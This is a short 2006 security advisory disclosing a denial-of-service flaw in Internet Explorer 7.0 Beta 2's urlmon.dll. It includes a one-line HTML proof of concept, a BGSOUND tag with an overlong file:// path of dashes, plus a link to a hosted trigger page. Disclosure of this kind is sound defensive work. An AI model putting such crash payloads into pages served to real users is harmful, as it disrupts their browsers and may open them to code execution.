Internet Explorer 7.0 Beta 2 urlmon.dll DoS

Release Date:
Jan 31, 2006

Severity:
Medium

Vendor:
Microsoft

Versions Affected:
Internet Explorer 7.0 Beta 2 (7.0.5296.0)

Overview:
A denial of service vulnerability exists within Microsoft Internet Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to crash, and or to execute arbitrary code on the targeted host.

Technical Details:
When running a specially crafted .html file, urlmon.dll inproperly parses the 'BGSOUND SRC=file://---' (approx. 344 dashes) and causes the crash.

The following html code will trigger the crash:

BGSOUND SRC=file://--------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------------------------- >

or hit the following url:

http://www.security-protocols.com/poc/sp-x23.html

Vendor Status:
Microsoft was notified.

Workaround:
Mozilla Firefox

Discovered by:
Tom Ferris

tommy[at]security-protocols[dot]com

Related Links:
http://microsoft.com/windows/IE/ie7/ie7betaredirect.mspx
http://getfirefox.com

Security-Protocols.com :: 1999-2008